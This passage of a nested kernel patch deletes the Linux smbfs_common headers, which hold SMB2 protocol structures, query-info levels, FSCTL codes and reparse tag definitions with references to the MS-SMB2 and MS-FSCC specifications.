+-	__le32 CreateDisposition;
+-	__le32 CreateOptions;
+-	__le16 NameOffset;
+-	__le16 NameLength;
+-	__le32 CreateContextsOffset;
+-	__le32 CreateContextsLength;
+-	__u8   Buffer[];
+-} __packed;
+-
+-struct smb2_create_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 89 */
+-	__u8   OplockLevel;
+-	__u8   Flags;  /* 0x01 if reparse point */
+-	__le32 CreateAction;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 AllocationSize;
+-	__le64 EndofFile;
+-	__le32 FileAttributes;
+-	__le32 Reserved2;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__le32 CreateContextsOffset;
+-	__le32 CreateContextsLength;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-struct create_posix {
+-	struct create_context ccontext;
+-	__u8    Name[16];
+-	__le32  Mode;
+-	__u32   Reserved;
+-} __packed;
+-
+-#define SMB2_LEASE_NONE_LE			cpu_to_le32(0x00)
+-#define SMB2_LEASE_READ_CACHING_LE		cpu_to_le32(0x01)
+-#define SMB2_LEASE_HANDLE_CACHING_LE		cpu_to_le32(0x02)
+-#define SMB2_LEASE_WRITE_CACHING_LE		cpu_to_le32(0x04)
+-
+-#define SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE	cpu_to_le32(0x02)
+-
+-#define SMB2_LEASE_KEY_SIZE			16
+-
+-struct lease_context {
+-	__u8 LeaseKey[SMB2_LEASE_KEY_SIZE];
+-	__le32 LeaseState;
+-	__le32 LeaseFlags;
+-	__le64 LeaseDuration;
+-} __packed;
+-
+-struct lease_context_v2 {
+-	__u8 LeaseKey[SMB2_LEASE_KEY_SIZE];
+-	__le32 LeaseState;
+-	__le32 LeaseFlags;
+-	__le64 LeaseDuration;
+-	__u8 ParentLeaseKey[SMB2_LEASE_KEY_SIZE];
+-	__le16 Epoch;
+-	__le16 Reserved;
+-} __packed;
+-
+-struct create_lease {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct lease_context lcontext;
+-} __packed;
+-
+-struct create_lease_v2 {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct lease_context_v2 lcontext;
+-	__u8   Pad[4];
+-} __packed;
+-
+-/* See MS-SMB2 2.2.31 and 2.2.32 */
+-struct smb2_ioctl_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 57 */
+-	__le16 Reserved; /* offset from start of SMB2 header to write data */
+-	__le32 CtlCode;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__le32 InputOffset; /* Reserved MBZ */
+-	__le32 InputCount;
+-	__le32 MaxInputResponse;
+-	__le32 OutputOffset;
+-	__le32 OutputCount;
+-	__le32 MaxOutputResponse;
+-	__le32 Flags;
+-	__le32 Reserved2;
+-	__u8   Buffer[];
+-} __packed;
+-
+-struct smb2_ioctl_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 49 */
+-	__le16 Reserved;
+-	__le32 CtlCode;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__le32 InputOffset; /* Reserved MBZ */
+-	__le32 InputCount;
+-	__le32 OutputOffset;
+-	__le32 OutputCount;
+-	__le32 Flags;
+-	__le32 Reserved2;
+-	__u8   Buffer[];
+-} __packed;
+-
+-/* this goes in the ioctl buffer when doing FSCTL_SET_ZERO_DATA */
+-struct file_zero_data_information {
+-	__le64	FileOffset;
+-	__le64	BeyondFinalZero;
+-} __packed;
+-
+-/* See MS-FSCC 2.3.7 */
+-struct duplicate_extents_to_file {
+-	__u64 PersistentFileHandle; /* source file handle, opaque endianness */
+-	__u64 VolatileFileHandle;
+-	__le64 SourceFileOffset;
+-	__le64 TargetFileOffset;
+-	__le64 ByteCount;  /* Bytes to be copied */
+-} __packed;
+-
+-/* See MS-FSCC 2.3.8 */
+-#define DUPLICATE_EXTENTS_DATA_EX_SOURCE_ATOMIC	0x00000001
+-struct duplicate_extents_to_file_ex {
+-	__u64 PersistentFileHandle; /* source file handle, opaque endianness */
+-	__u64 VolatileFileHandle;
+-	__le64 SourceFileOffset;
+-	__le64 TargetFileOffset;
+-	__le64 ByteCount;  /* Bytes to be copied */
+-	__le32 Flags;
+-	__le32 Reserved;
+-} __packed;
+-
+-
+-/* See MS-FSCC 2.3.20 */
+-struct fsctl_get_integrity_information_rsp {
+-	__le16	ChecksumAlgorithm;
+-	__le16	Reserved;
+-	__le32	Flags;
+-	__le32	ChecksumChunkSizeInBytes;
+-	__le32	ClusterSizeInBytes;
+-} __packed;
+-
+-/* See MS-FSCC 2.3.55 */
+-struct fsctl_query_file_regions_req {
+-	__le64	FileOffset;
+-	__le64	Length;
+-	__le32	DesiredUsage;
+-	__le32	Reserved;
+-} __packed;
+-
+-/* DesiredUsage flags see MS-FSCC 2.3.56.1 */
+-#define FILE_USAGE_INVALID_RANGE	0x00000000
+-#define FILE_USAGE_VALID_CACHED_DATA	0x00000001
+-#define FILE_USAGE_NONCACHED_DATA	0x00000002
+-
+-struct file_region_info {
+-	__le64	FileOffset;
+-	__le64	Length;
+-	__le32	DesiredUsage;
+-	__le32	Reserved;
+-} __packed;
+-
+-/* See MS-FSCC 2.3.56 */
+-struct fsctl_query_file_region_rsp {
+-	__le32 Flags;
+-	__le32 TotalRegionEntryCount;
+-	__le32 RegionEntryCount;
+-	__u32  Reserved;
+-	struct  file_region_info Regions[];
+-} __packed;
+-
+-/* See MS-FSCC 2.3.58 */
+-struct fsctl_query_on_disk_vol_info_rsp {
+-	__le64	DirectoryCount;
+-	__le64	FileCount;
+-	__le16	FsFormatMajVersion;
+-	__le16	FsFormatMinVersion;
+-	__u8	FsFormatName[24];
+-	__le64	FormatTime;
+-	__le64	LastUpdateTime;
+-	__u8	CopyrightInfo[68];
+-	__u8	AbstractInfo[68];
+-	__u8	FormatImplInfo[68];
+-	__u8	LastModifyImplInfo[68];
+-} __packed;
+-
+-/* See MS-FSCC 2.3.73 */
+-struct fsctl_set_integrity_information_req {
+-	__le16	ChecksumAlgorithm;
+-	__le16	Reserved;
+-	__le32	Flags;
+-} __packed;
+-
+-/* See MS-FSCC 2.3.75 */
+-struct fsctl_set_integrity_info_ex_req {
+-	__u8	EnableIntegrity;
+-	__u8	KeepState;
+-	__u16	Reserved;
+-	__le32	Flags;
+-	__u8	Version;
+-	__u8	Reserved2[7];
+-} __packed;
+-
+-/* Integrity ChecksumAlgorithm choices for above */
+-#define	CHECKSUM_TYPE_NONE	0x0000
+-#define	CHECKSUM_TYPE_CRC64	0x0002
+-#define	CHECKSUM_TYPE_UNCHANGED	0xFFFF	/* set only */
+-
+-/* Integrity flags for above */
+-#define FSCTL_INTEGRITY_FLAG_CHECKSUM_ENFORCEMENT_OFF	0x00000001
+-
+-/* Reparse structures - see MS-FSCC 2.1.2 */
+-
+-/* struct fsctl_reparse_info_req is empty, only response structs (see below) */
+-struct reparse_data_buffer {
+-	__le32	ReparseTag;
+-	__le16	ReparseDataLength;
+-	__u16	Reserved;
+-	__u8	DataBuffer[]; /* Variable Length */
+-} __packed;
+-
+-struct reparse_guid_data_buffer {
+-	__le32	ReparseTag;
+-	__le16	ReparseDataLength;
+-	__u16	Reserved;
+-	__u8	ReparseGuid[16];
+-	__u8	DataBuffer[]; /* Variable Length */
+-} __packed;
+-
+-struct reparse_mount_point_data_buffer {
+-	__le32	ReparseTag;
+-	__le16	ReparseDataLength;
+-	__u16	Reserved;
+-	__le16	SubstituteNameOffset;
+-	__le16	SubstituteNameLength;
+-	__le16	PrintNameOffset;
+-	__le16	PrintNameLength;
+-	__u8	PathBuffer[]; /* Variable Length */
+-} __packed;
+-
+-#define SYMLINK_FLAG_RELATIVE 0x00000001
+-
+-struct reparse_symlink_data_buffer {
+-	__le32	ReparseTag;
+-	__le16	ReparseDataLength;
+-	__u16	Reserved;
+-	__le16	SubstituteNameOffset;
+-	__le16	SubstituteNameLength;
+-	__le16	PrintNameOffset;
+-	__le16	PrintNameLength;
+-	__le32	Flags;
+-	__u8	PathBuffer[]; /* Variable Length */
+-} __packed;
+-
+-/* See MS-FSCC 2.1.2.6 and cifspdu.h for struct reparse_posix_data */
+-
+-struct validate_negotiate_info_req {
+-	__le32 Capabilities;
+-	__u8   Guid[SMB2_CLIENT_GUID_SIZE];
+-	__le16 SecurityMode;
+-	__le16 DialectCount;
+-	__le16 Dialects[4]; /* BB expand this if autonegotiate > 4 dialects */
+-} __packed;
+-
+-struct validate_negotiate_info_rsp {
+-	__le32 Capabilities;
+-	__u8   Guid[SMB2_CLIENT_GUID_SIZE];
+-	__le16 SecurityMode;
+-	__le16 Dialect; /* Dialect in use for the connection */
+-} __packed;
+-
+-
+-/* Possible InfoType values */
+-#define SMB2_O_INFO_FILE	0x01
+-#define SMB2_O_INFO_FILESYSTEM	0x02
+-#define SMB2_O_INFO_SECURITY	0x03
+-#define SMB2_O_INFO_QUOTA	0x04
+-
+-/* SMB2 Query Info see MS-SMB2 (2.2.37) or MS-DTYP */
+-
+-/* List of QUERY INFO levels (those also valid for QUERY_DIR are noted below */
+-#define FILE_DIRECTORY_INFORMATION	1	/* also for QUERY_DIR */
+-#define FILE_FULL_DIRECTORY_INFORMATION 2	/* also for QUERY_DIR */
+-#define FILE_BOTH_DIRECTORY_INFORMATION 3	/* also for QUERY_DIR */
+-#define FILE_BASIC_INFORMATION		4
+-#define FILE_STANDARD_INFORMATION	5
+-#define FILE_INTERNAL_INFORMATION	6
+-#define FILE_EA_INFORMATION	        7
+-#define FILE_ACCESS_INFORMATION		8
+-#define FILE_NAME_INFORMATION		9
+-#define FILE_RENAME_INFORMATION		10
+-#define FILE_LINK_INFORMATION		11
+-#define FILE_NAMES_INFORMATION		12	/* also for QUERY_DIR */
+-#define FILE_DISPOSITION_INFORMATION	13
+-#define FILE_POSITION_INFORMATION	14
+-#define FILE_FULL_EA_INFORMATION	15
+-#define FILE_MODE_INFORMATION		16
+-#define FILE_ALIGNMENT_INFORMATION	17
+-#define FILE_ALL_INFORMATION		18
+-#define FILE_ALLOCATION_INFORMATION	19
+-#define FILE_END_OF_FILE_INFORMATION	20
+-#define FILE_ALTERNATE_NAME_INFORMATION 21
+-#define FILE_STREAM_INFORMATION		22
+-#define FILE_PIPE_INFORMATION		23
+-#define FILE_PIPE_LOCAL_INFORMATION	24
+-#define FILE_PIPE_REMOTE_INFORMATION	25
+-#define FILE_MAILSLOT_QUERY_INFORMATION 26
+-#define FILE_MAILSLOT_SET_INFORMATION	27
+-#define FILE_COMPRESSION_INFORMATION	28
+-#define FILE_OBJECT_ID_INFORMATION	29
+-/* Number 30 not defined in documents */
+-#define FILE_MOVE_CLUSTER_INFORMATION	31
+-#define FILE_QUOTA_INFORMATION		32
+-#define FILE_REPARSE_POINT_INFORMATION	33
+-#define FILE_NETWORK_OPEN_INFORMATION	34
+-#define FILE_ATTRIBUTE_TAG_INFORMATION	35
+-#define FILE_TRACKING_INFORMATION	36
+-#define FILEID_BOTH_DIRECTORY_INFORMATION 37	/* also for QUERY_DIR */
+-#define FILEID_FULL_DIRECTORY_INFORMATION 38	/* also for QUERY_DIR */
+-#define FILE_VALID_DATA_LENGTH_INFORMATION 39
+-#define FILE_SHORT_NAME_INFORMATION	40
+-#define FILE_SFIO_RESERVE_INFORMATION	44
+-#define FILE_SFIO_VOLUME_INFORMATION	45
+-#define FILE_HARD_LINK_INFORMATION	46
+-#define FILE_NORMALIZED_NAME_INFORMATION 48
+-#define FILEID_GLOBAL_TX_DIRECTORY_INFORMATION 50
+-#define FILE_STANDARD_LINK_INFORMATION	54
+-#define FILE_ID_INFORMATION		59
+-#define FILE_ID_EXTD_DIRECTORY_INFORMATION 60	/* also for QUERY_DIR */
+-/* Used for Query Info and Find File POSIX Info for SMB3.1.1 and SMB1 */
+-#define SMB_FIND_FILE_POSIX_INFO	0x064
+-
+-/* Security info type additionalinfo flags. */
+-#define OWNER_SECINFO   0x00000001
+-#define GROUP_SECINFO   0x00000002
+-#define DACL_SECINFO   0x00000004
+-#define SACL_SECINFO   0x00000008
+-#define LABEL_SECINFO   0x00000010
+-#define ATTRIBUTE_SECINFO   0x00000020
+-#define SCOPE_SECINFO   0x00000040
+-#define BACKUP_SECINFO   0x00010000
+-#define UNPROTECTED_SACL_SECINFO   0x10000000
+-#define UNPROTECTED_DACL_SECINFO   0x20000000
+-#define PROTECTED_SACL_SECINFO   0x40000000
+-#define PROTECTED_DACL_SECINFO   0x80000000
+-
+-/* Flags used for FileFullEAinfo */
+-#define SL_RESTART_SCAN		0x00000001
+-#define SL_RETURN_SINGLE_ENTRY	0x00000002
+-#define SL_INDEX_SPECIFIED	0x00000004
+-
+-struct smb2_query_info_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 41 */
+-	__u8   InfoType;
+-	__u8   FileInfoClass;
+-	__le32 OutputBufferLength;
+-	__le16 InputBufferOffset;
+-	__u16  Reserved;
+-	__le32 InputBufferLength;
+-	__le32 AdditionalInformation;
+-	__le32 Flags;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-struct smb2_query_info_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 9 */
+-	__le16 OutputBufferOffset;
+-	__le32 OutputBufferLength;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-/*
+- *	PDU query infolevel structure definitions
+- */
+-
+-/* See MS-FSCC 2.3.52 */
+-struct file_allocated_range_buffer {
+-	__le64	file_offset;
+-	__le64	length;
+-} __packed;
+-
+-struct smb2_file_internal_info {
+-	__le64 IndexNumber;
+-} __packed; /* level 6 Query */
+-
+-struct smb2_file_rename_info { /* encoding of request for level 10 */
+-	__u8   ReplaceIfExists; /* 1 = replace existing target with new */
+-				/* 0 = fail if target already exists */
+-	__u8   Reserved[7];
+-	__u64  RootDirectory;  /* MBZ for network operations (why says spec?) */
+-	__le32 FileNameLength;
+-	char   FileName[];     /* New name to be assigned */
+-	/* padding - overall struct size must be >= 24 so filename + pad >= 6 */
+-} __packed; /* level 10 Set */
+-
+-struct smb2_file_link_info { /* encoding of request for level 11 */
+-	__u8   ReplaceIfExists; /* 1 = replace existing link with new */
+-				/* 0 = fail if link already exists */
+-	__u8   Reserved[7];
+-	__u64  RootDirectory;  /* MBZ for network operations (why says spec?) */
+-	__le32 FileNameLength;
+-	char   FileName[];     /* Name to be assigned to new link */
+-} __packed; /* level 11 Set */
+-
+-/*
+- * This level 18, although with struct with same name is different from cifs
+- * level 0x107. Level 0x107 has an extra u64 between AccessFlags and
+- * CurrentByteOffset.
+- */
+-struct smb2_file_all_info { /* data block encoding of response to level 18 */
+-	__le64 CreationTime;	/* Beginning of FILE_BASIC_INFO equivalent */
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 Attributes;
+-	__u32  Pad1;		/* End of FILE_BASIC_INFO_INFO equivalent */
+-	__le64 AllocationSize;	/* Beginning of FILE_STANDARD_INFO equivalent */
+-	__le64 EndOfFile;	/* size ie offset to first free byte in file */
+-	__le32 NumberOfLinks;	/* hard links */
+-	__u8   DeletePending;
+-	__u8   Directory;
+-	__u16  Pad2;		/* End of FILE_STANDARD_INFO equivalent */
+-	__le64 IndexNumber;
+-	__le32 EASize;
+-	__le32 AccessFlags;
+-	__le64 CurrentByteOffset;
+-	__le32 Mode;
+-	__le32 AlignmentRequirement;
+-	__le32 FileNameLength;
+-	char   FileName[1];
+-} __packed; /* level 18 Query */
+-
+-struct smb2_file_eof_info { /* encoding of request for level 10 */
+-	__le64 EndOfFile; /* new end of file value */
+-} __packed; /* level 20 Set */
+-
+-/* Level 100 query info */
+-struct smb311_posix_qinfo {
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 DosAttributes;
+-	__le64 Inode;
+-	__le32 DeviceId;
+-	__le32 Zero;
+-	/* beginning of POSIX Create Context Response */
+-	__le32 HardLinks;
+-	__le32 ReparseTag;
+-	__le32 Mode;
+-	u8     Sids[];
+-	/*
+-	 * var sized owner SID
+-	 * var sized group SID
+-	 * le32 filenamelength
+-	 * u8  filename[]
+-	 */
+-} __packed;
+-
+-/* File System Information Classes */
+-#define FS_VOLUME_INFORMATION		1 /* Query */
+-#define FS_LABEL_INFORMATION		2 /* Set */
+-#define FS_SIZE_INFORMATION		3 /* Query */
+-#define FS_DEVICE_INFORMATION		4 /* Query */
+-#define FS_ATTRIBUTE_INFORMATION	5 /* Query */
+-#define FS_CONTROL_INFORMATION		6 /* Query, Set */
+-#define FS_FULL_SIZE_INFORMATION	7 /* Query */
+-#define FS_OBJECT_ID_INFORMATION	8 /* Query, Set */
+-#define FS_DRIVER_PATH_INFORMATION	9 /* Query */
+-#define FS_SECTOR_SIZE_INFORMATION	11 /* SMB3 or later. Query */
+-#define FS_POSIX_INFORMATION		100 /* SMB3.1.1 POSIX. Query */
+-
+-struct smb2_fs_full_size_info {
+-	__le64 TotalAllocationUnits;
+-	__le64 CallerAvailableAllocationUnits;
+-	__le64 ActualAvailableAllocationUnits;
+-	__le32 SectorsPerAllocationUnit;
+-	__le32 BytesPerSector;
+-} __packed;
+-
+-#define SSINFO_FLAGS_ALIGNED_DEVICE		0x00000001
+-#define SSINFO_FLAGS_PARTITION_ALIGNED_ON_DEVICE 0x00000002
+-#define SSINFO_FLAGS_NO_SEEK_PENALTY		0x00000004
+-#define SSINFO_FLAGS_TRIM_ENABLED		0x00000008
+-
+-/* sector size info struct */
+-struct smb3_fs_ss_info {
+-	__le32 LogicalBytesPerSector;
+-	__le32 PhysicalBytesPerSectorForAtomicity;
+-	__le32 PhysicalBytesPerSectorForPerf;
+-	__le32 FSEffPhysicalBytesPerSectorForAtomicity;
+-	__le32 Flags;
+-	__le32 ByteOffsetForSectorAlignment;
+-	__le32 ByteOffsetForPartitionAlignment;
+-} __packed;
+-
+-/* File System Control Information */
+-struct smb2_fs_control_info {
+-	__le64 FreeSpaceStartFiltering;
+-	__le64 FreeSpaceThreshold;
+-	__le64 FreeSpaceStopFiltering;
+-	__le64 DefaultQuotaThreshold;
+-	__le64 DefaultQuotaLimit;
+-	__le32 FileSystemControlFlags;
+-	__le32 Padding;
+-} __packed;
+-
+-/* volume info struct - see MS-FSCC 2.5.9 */
+-#define MAX_VOL_LABEL_LEN	32
+-struct smb3_fs_vol_info {
+-	__le64	VolumeCreationTime;
+-	__u32	VolumeSerialNumber;
+-	__le32	VolumeLabelLength; /* includes trailing null */
+-	__u8	SupportsObjects; /* True if eg like NTFS, supports objects */
+-	__u8	Reserved;
+-	__u8	VolumeLabel[]; /* variable len */
+-} __packed;
+-
+-/* See MS-SMB2 2.2.23 through 2.2.25 */
+-struct smb2_oplock_break {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 24 */
+-	__u8   OplockLevel;
+-	__u8   Reserved;
+-	__le32 Reserved2;
+-	__u64  PersistentFid;
+-	__u64  VolatileFid;
+-} __packed;
+-
+-#define SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED cpu_to_le32(0x01)
+-
+-struct smb2_lease_break {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 44 */
+-	__le16 Epoch;
+-	__le32 Flags;
+-	__u8   LeaseKey[16];
+-	__le32 CurrentLeaseState;
+-	__le32 NewLeaseState;
+-	__le32 BreakReason;
+-	__le32 AccessMaskHint;
+-	__le32 ShareMaskHint;
+-} __packed;
+-
+-struct smb2_lease_ack {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 36 */
+-	__le16 Reserved;
+-	__le32 Flags;
+-	__u8   LeaseKey[16];
+-	__le32 LeaseState;
+-	__le64 LeaseDuration;
+-} __packed;
+-
+-#define OP_BREAK_STRUCT_SIZE_20		24
+-#define OP_BREAK_STRUCT_SIZE_21		36
+-#endif				/* _COMMON_SMB2PDU_H */
+diff --git a/fs/smbfs_common/smbfsctl.h b/fs/smbfs_common/smbfsctl.h
+deleted file mode 100644
+index edd7fc2a7921b..0000000000000
+--- a/fs/smbfs_common/smbfsctl.h
++++ /dev/null
+@@ -1,170 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1+ */
+-/*
+- *   SMB, CIFS, SMB2 FSCTL definitions
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2013
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-/* IOCTL information */
+-/*
+- * List of ioctl/fsctl function codes that are or could be useful in the
+- * future to remote clients like cifs or SMB2/SMB3 client.  This is probably
+- * a slightly larger set of fsctls that NTFS local filesystem could handle,
+- * including the seven below that we do not have struct definitions for.
+- * Even with protocol definitions for most of these now available, we still
+- * need to do some experimentation to identify which are practical to do
+- * remotely.  Some of the following, such as the encryption/compression ones
+- * could be invoked from tools via a specialized hook into the VFS rather
+- * than via the standard vfs entry points
+- *
+- * See MS-SMB2 Section 2.2.31 (last checked September 2021, all of that list are
+- * below). Additional detail on less common ones can be found in MS-FSCC
+- * section 2.3.
+- */
+-
+-#ifndef __SMBFSCTL_H
+-#define __SMBFSCTL_H
+-
+-/*
+- * FSCTL values are 32 bits and are constructed as
+- * <device 16bits> <access 2bits> <function 12bits> <method 2bits>
+- */
+-/* Device */
+-#define FSCTL_DEVICE_DFS                 (0x0006 << 16)
+-#define FSCTL_DEVICE_FILE_SYSTEM         (0x0009 << 16)
+-#define FSCTL_DEVICE_NAMED_PIPE          (0x0011 << 16)
+-#define FSCTL_DEVICE_NETWORK_FILE_SYSTEM (0x0014 << 16)
+-#define FSCTL_DEVICE_MASK                0xffff0000
+-/* Access */
+-#define FSCTL_DEVICE_ACCESS_FILE_ANY_ACCESS        (0x00 << 14)
+-#define FSCTL_DEVICE_ACCESS_FILE_READ_ACCESS       (0x01 << 14)
+-#define FSCTL_DEVICE_ACCESS_FILE_WRITE_ACCESS      (0x02 << 14)
+-#define FSCTL_DEVICE_ACCESS_FILE_READ_WRITE_ACCESS (0x03 << 14)
+-#define FSCTL_DEVICE_ACCESS_MASK                   0x0000c000
+-/* Function */
+-#define FSCTL_DEVICE_FUNCTION_MASK       0x00003ffc
+-/* Method */
+-#define FSCTL_DEVICE_METHOD_BUFFERED   0x00
+-#define FSCTL_DEVICE_METHOD_IN_DIRECT  0x01
+-#define FSCTL_DEVICE_METHOD_OUT_DIRECT 0x02
+-#define FSCTL_DEVICE_METHOD_NEITHER    0x03
+-#define FSCTL_DEVICE_METHOD_MASK       0x00000003
+-
+-
+-#define FSCTL_DFS_GET_REFERRALS      0x00060194
+-#define FSCTL_DFS_GET_REFERRALS_EX   0x000601B0
+-#define FSCTL_REQUEST_OPLOCK_LEVEL_1 0x00090000
+-#define FSCTL_REQUEST_OPLOCK_LEVEL_2 0x00090004
+-#define FSCTL_REQUEST_BATCH_OPLOCK   0x00090008
+-#define FSCTL_LOCK_VOLUME            0x00090018
+-#define FSCTL_UNLOCK_VOLUME          0x0009001C
+-#define FSCTL_IS_PATHNAME_VALID      0x0009002C /* BB add struct */
+-#define FSCTL_GET_COMPRESSION        0x0009003C /* BB add struct */
+-#define FSCTL_SET_COMPRESSION        0x0009C040 /* BB add struct */
+-#define FSCTL_QUERY_FAT_BPB          0x00090058 /* BB add struct */
+-/* Verify the next FSCTL number, we had it as 0x00090090 before */
+-#define FSCTL_FILESYSTEM_GET_STATS   0x00090060 /* BB add struct */
+-#define FSCTL_GET_NTFS_VOLUME_DATA   0x00090064 /* BB add struct */
+-#define FSCTL_GET_RETRIEVAL_POINTERS 0x00090073 /* BB add struct */
+-#define FSCTL_IS_VOLUME_DIRTY        0x00090078 /* BB add struct */
+-#define FSCTL_ALLOW_EXTENDED_DASD_IO 0x00090083 /* BB add struct */
+-#define FSCTL_REQUEST_FILTER_OPLOCK  0x0009008C
+-#define FSCTL_FIND_FILES_BY_SID      0x0009008F /* BB add struct */
+-#define FSCTL_SET_OBJECT_ID          0x00090098 /* BB add struct */
+-#define FSCTL_GET_OBJECT_ID          0x0009009C /* BB add struct */
+-#define FSCTL_DELETE_OBJECT_ID       0x000900A0 /* BB add struct */
+-#define FSCTL_SET_REPARSE_POINT      0x000900A4 /* BB add struct */
+-#define FSCTL_GET_REPARSE_POINT      0x000900A8 /* BB add struct */
+-#define FSCTL_DELETE_REPARSE_POINT   0x000900AC /* BB add struct */
+-#define FSCTL_SET_OBJECT_ID_EXTENDED 0x000900BC /* BB add struct */
+-#define FSCTL_CREATE_OR_GET_OBJECT_ID 0x000900C0 /* BB add struct */
+-#define FSCTL_SET_SPARSE             0x000900C4 /* BB add struct */
+-#define FSCTL_SET_ZERO_DATA          0x000980C8
+-#define FSCTL_SET_ENCRYPTION         0x000900D7 /* BB add struct */
+-#define FSCTL_ENCRYPTION_FSCTL_IO    0x000900DB /* BB add struct */
+-#define FSCTL_WRITE_RAW_ENCRYPTED    0x000900DF /* BB add struct */
+-#define FSCTL_READ_RAW_ENCRYPTED     0x000900E3 /* BB add struct */
+-#define FSCTL_READ_FILE_USN_DATA     0x000900EB /* BB add struct */
+-#define FSCTL_WRITE_USN_CLOSE_RECORD 0x000900EF /* BB add struct */
+-#define FSCTL_MARK_HANDLE	     0x000900FC /* BB add struct */
+-#define FSCTL_SIS_COPYFILE           0x00090100 /* BB add struct */
+-#define FSCTL_RECALL_FILE            0x00090117 /* BB add struct */
+-#define FSCTL_QUERY_SPARING_INFO     0x00090138 /* BB add struct */
+-#define FSCTL_QUERY_ON_DISK_VOLUME_INFO 0x0009013C
+-#define FSCTL_SET_ZERO_ON_DEALLOC    0x00090194 /* BB add struct */
+-#define FSCTL_SET_SHORT_NAME_BEHAVIOR 0x000901B4 /* BB add struct */
+-#define FSCTL_GET_INTEGRITY_INFORMATION 0x0009027C
+-#define FSCTL_QUERY_FILE_REGIONS     0x00090284
+-#define FSCTL_GET_REFS_VOLUME_DATA   0x000902D8 /* See MS-FSCC 2.3.24 */
+-#define FSCTL_SET_INTEGRITY_INFORMATION_EXT 0x00090380
+-#define FSCTL_GET_RETRIEVAL_POINTERS_AND_REFCOUNT 0x000903d3
+-#define FSCTL_GET_RETRIEVAL_POINTER_COUNT 0x0009042b
+-#define FSCTL_REFS_STREAM_SNAPSHOT_MANAGEMENT 0x00090440
+-#define FSCTL_QUERY_ALLOCATED_RANGES 0x000940CF
+-#define FSCTL_OFFLOAD_READ	0x00094264 /* BB add struct */
+-#define FSCTL_OFFLOAD_WRITE	0x00098268 /* BB add struct */
+-#define FSCTL_SET_DEFECT_MANAGEMENT  0x00098134 /* BB add struct */
+-#define FSCTL_FILE_LEVEL_TRIM        0x00098208 /* BB add struct */
+-#define FSCTL_DUPLICATE_EXTENTS_TO_FILE 0x00098344
+-#define FSCTL_DUPLICATE_EXTENTS_TO_FILE_EX 0x000983E8
+-#define FSCTL_SIS_LINK_FILES         0x0009C104
+-#define FSCTL_SET_INTEGRITY_INFORMATION 0x0009C280
+-#define FSCTL_PIPE_PEEK              0x0011400C /* BB add struct */
+-#define FSCTL_PIPE_TRANSCEIVE        0x0011C017 /* BB add struct */
+-/* strange that the number for this op is not sequential with previous op */
+-#define FSCTL_PIPE_WAIT              0x00110018 /* BB add struct */
+-/* Enumerate previous versions of a file */
+-#define FSCTL_SRV_ENUMERATE_SNAPSHOTS 0x00144064
+-/* Retrieve an opaque file reference for server-side data movement ie copy */
+-#define FSCTL_SRV_REQUEST_RESUME_KEY 0x00140078
+-#define FSCTL_LMR_REQUEST_RESILIENCY 0x001401D4
+-#define FSCTL_LMR_GET_LINK_TRACK_INF 0x001400E8 /* BB add struct */
+-#define FSCTL_LMR_SET_LINK_TRACK_INF 0x001400EC /* BB add struct */
+-#define FSCTL_VALIDATE_NEGOTIATE_INFO 0x00140204
+-/* Perform server-side data movement */
+-#define FSCTL_SRV_COPYCHUNK 0x001440F2
+-#define FSCTL_SRV_COPYCHUNK_WRITE 0x001480F2
+-#define FSCTL_QUERY_NETWORK_INTERFACE_INFO 0x001401FC /* BB add struct */
+-#define FSCTL_SRV_READ_HASH          0x001441BB /* BB add struct */
+-
+-/* See FSCC 2.1.2.5 */
+-#define IO_REPARSE_TAG_MOUNT_POINT   0xA0000003
+-#define IO_REPARSE_TAG_HSM           0xC0000004
+-#define IO_REPARSE_TAG_SIS           0x80000007
+-#define IO_REPARSE_TAG_HSM2          0x80000006
+-#define IO_REPARSE_TAG_DRIVER_EXTENDER 0x80000005
+-/* Used by the DFS filter. See MS-DFSC */
+-#define IO_REPARSE_TAG_DFS           0x8000000A
+-/* Used by the DFS filter See MS-DFSC */
+-#define IO_REPARSE_TAG_DFSR          0x80000012
+-#define IO_REPARSE_TAG_FILTER_MANAGER 0x8000000B
+-/* See section MS-FSCC 2.1.2.4 */
+-#define IO_REPARSE_TAG_SYMLINK       0xA000000C
+-#define IO_REPARSE_TAG_DEDUP         0x80000013
+-#define IO_REPARSE_APPXSTREAM	     0xC0000014
+-/* NFS symlinks, Win 8/SMB3 and later */
+-#define IO_REPARSE_TAG_NFS           0x80000014
+-/*
+- * AzureFileSync - see
+- * https://docs.microsoft.com/en-us/azure/storage/files/storage-sync-cloud-tiering
+- */
+-#define IO_REPARSE_TAG_AZ_FILE_SYNC  0x8000001e
+-/* WSL reparse tags */
+-#define IO_REPARSE_TAG_LX_SYMLINK    0xA000001D
+-#define IO_REPARSE_TAG_AF_UNIX	     0x80000023
+-#define IO_REPARSE_TAG_LX_FIFO	     0x80000024
+-#define IO_REPARSE_TAG_LX_CHR	     0x80000025
